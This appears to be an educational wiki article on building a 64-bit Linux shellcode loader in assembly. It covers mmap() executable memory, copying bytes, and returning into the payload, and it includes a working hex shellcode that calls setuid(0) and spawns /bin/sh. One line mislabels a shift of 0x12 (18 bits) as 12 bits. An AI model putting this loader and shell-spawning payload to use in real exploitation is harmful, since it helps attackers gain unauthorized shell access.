Shellcode/Loaders
Shellcode loaders are used to test shellcode before use in a buffer overflow or other form of binary exploitation. The best way to construct a loader for user-friendly operations is by taking the shellcode as a command line argument and passing it to freshly allocated executable memory space. This article examines the construction of such a loader for Linux in assembly language for the 64-bit x86 instruction set architecture, though a 32-bit shellcode loader is provided in the appendix.
Contents
Executable loader
- This section examines the 64-bit loader provided in the shellcodecs package.
Command Line Arguments
Command line arguments are pushed onto the stack in this order: second argument, first argument, number of arguments. Therefore, in order to get the shellcode from the arguments, pop the %rbx register three times. Once this is done, the %rbx register will contain a pointer to the shellcode:
_start: pop %rbx # argc pop %rbx # arg0 pop %rbx # arg1 pointer |
Executable memory allocation with mmap()
- See also: Unlinked 64-bit system calls, the 64-bit system call table
Because modern operating systems have non-executable stacks by default, an executable stack must be constructed for successful code execution. This is done with the mmap() system call.
The prototype for mmap() is:
void *mmap(void *addr, size_t len, int prot, int flags, int fildes, off_t off); |
On 64-bit processors, function arguments are passed like so:
function_call(%rax) = function(%rdi, %rsi, %rdx, %r10, %r8, %r9) ^system ^arg1 ^arg2 ^arg3 ^arg4 ^arg5 ^arg6 call # |
First, the system call number for mmap() is placed into %rax:
push $0x9 pop %rax |
The first argument (%rdi) of mmap() should be null, so using xor, %rdi is set to zero.
xor %rdi, %rdi |
- The desired size of the buffer (4096 bytes or 0x1000 in hex) is passed into %rsi as the second argument to mmap.
The %rsi register is initialized to zero by pushing %rdi and popping %rsi:
push %rdi pop %rsi |
Then incremented to get it to 0x0001:
inc %rsi |
And shifted left 12 bits (1 shifted left 12 bits will become 0x1000 or binary 00010000 00000000):
shl $0x12, %rsi |
The third argument (%rdx) contains the memory permissions (read, write, execute, or none), for multiple, they are put together using bitwise or. Since 7 is the result of ORing the flags PROT_READ, PROT_WRITE, and PROT_EXEC, the or itself is skipped and its value (7) is stored in the %rdx register.
push $0x7 pop %rdx |
The flags argument functions the same way as the "prot" argument, but requires constants for mapping. In this case MAP_PRIVATE|MAP_ANONYMOUS, which maps out to 0x22, is stored in %r10.
push $0x22 pop %r10 |
The final two arguments should be null and stored in %r8 and %r9.
push %rdi push %rdi pop %r8 pop %r9 |
Once the registers are set, a syscall is used to invoke mmap().
syscall # The syscall for the mmap(). |
The %rax register now contains a pointer to the buffer returned by mmap() to copy the shellcode into.
Copying the code into the new memory
The %rsi register is initialized to 0 to be used as a counter:
inject: xor %rsi, %rsi |
%rdi will be null as well because the current byte is compared to %dil to determine when the end of the shellcode has been reached.
push %rsi pop %rdi |
If so, then jump to inject_finished and actually execute the code.
inject_loop: cmpb %dil, (%rbx, %rsi, 1) je inject_finished |
Each byte of the shellcode is moved from %rbx + %rsi (current location) into %rax + %rsi (new executable memory) through the '%r10b single-byte sub-register of %r10:
movb (%rbx, %rsi, 1), %r10b movb %r10b, (%rax,%rsi,1) |
%rsi is incremented as both the offset and the counter:
inc %rsi |
And then the loop restarts:
jmp inject_loop
|
The inject_finished routine then appends the ret opcode, 0xc3, to the end of the shellcode:
inject_finished: movb $0xc3, (%rax, %rsi, 1) |
Returning to the code
The reason that the code is returned to rather than jumped to or called is because this more adequately simulates the environment similar to that of a vulnerable application at the time of a buffer overflow. A payload is returned to, and therefore, when shellcode is loaded, it should also be returned to.
First, ret_to_shellcode is called. This causes the address of exit to be pushed onto the stack, so that the end of the shellcode now returns to <address of exit>.
call ret_to_shellcode
|
The original return address is then overwritten with the address of the shellcode, and returned into.
ret_to_shellcode: push %rax ret |
When the shellcode completes, it will return to the exit function to exit cleanly:
exit: push $60 pop %rax xor %rdi, %rdi syscall |
Once the code is complete (source) it can be built the same way as any assembly program:
╭─user@host ~ ╰─➤ as -oloader-64.o loader-64.s ╭─user@host ~ ╰─➤ ld -oloader-64 loader-64.o
Or by typing `make' from the root directory of shellcodecs.
Using the executable loader
The shellcode invoked here is the same as the shellcode constructed and extracted earlier. Notice the change in prompt, and that exit returns the original prompt. This indicates that the shellcode executed successfully.
╭─user@host ~ ╰─➤ ./loader "$(echo -en "\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05");" [user@host ~]$ exit exit ╭─user@host ~ ╰─➤
Return oriented loader
Return oriented code can be tested using a loader as well; though a much smaller loader is used as return-oriented code should not require executable memory allocation:
_start: pop %rbx pop %rbx pop %rsp # %rsp now points to arg1 in the stack ret |
See also
- Related tool: shellcodecs
Other loaders include the dynamic loader and the dynamic socket loader. These are used when the shellcode depends on the context of the vulnerable binary application containing a dynamic section for linking.